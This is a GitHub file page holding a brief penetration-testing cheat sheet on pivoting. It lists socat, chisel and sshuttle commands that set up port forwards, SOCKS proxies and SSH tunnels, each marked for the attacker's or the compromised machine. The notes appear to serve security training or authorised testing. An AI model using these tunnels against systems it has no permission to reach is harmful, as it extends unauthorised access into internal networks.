-
Notifications
You must be signed in to change notification settings - Fork 6
/
Pivoting
34 lines (28 loc) · 1.37 KB
/
Pivoting
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
Proxy/tunnelling -
- Using Socat
- Portforwarding -- Quiet
- `socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &` - attacking machine
- `./socat tcp:ATTACKING_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork & - compromised machine`
- Using Chisel
- Reverse SOCKS Proxy
-`./chisel server -p LISTEN_PORT --reverse & ` - attacking
- `./chisel client ATTACKING_IP:LISTEN_PORT R:socks &` - compromised
- Foward SOCKS Proxy
- `./chisel server -p LISTEN_PORT --socks5` - compromised
- `./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks` -attacking
- Use of ProxyChains to tunnel the traffic/data
- Remote Port Forward
- `./chisel server -p LISTEN_PORT --reverse &` - attacking
- `./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &`
-compromised
- Local port Forward
- `./chisel server -p LISTEN_PORT` - compromised
- `./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT` - attacking
- Sshuttle (Creating a tunnel through SSH with encyption)
- `sshuttle -r username@address subnet`
- `-N` - Attemps to determine the server's routing table
- `sshuttle -r username@address -N`
- `--ssh-cmd` - specifiy private key
- `sshuttle -r user@address --ssh-cmd "ssh -i KEYFILE" SUBNET`
- `-x` - exclude the compromised server form the subnet range
- `sshuttle -r username@address subnet -x address`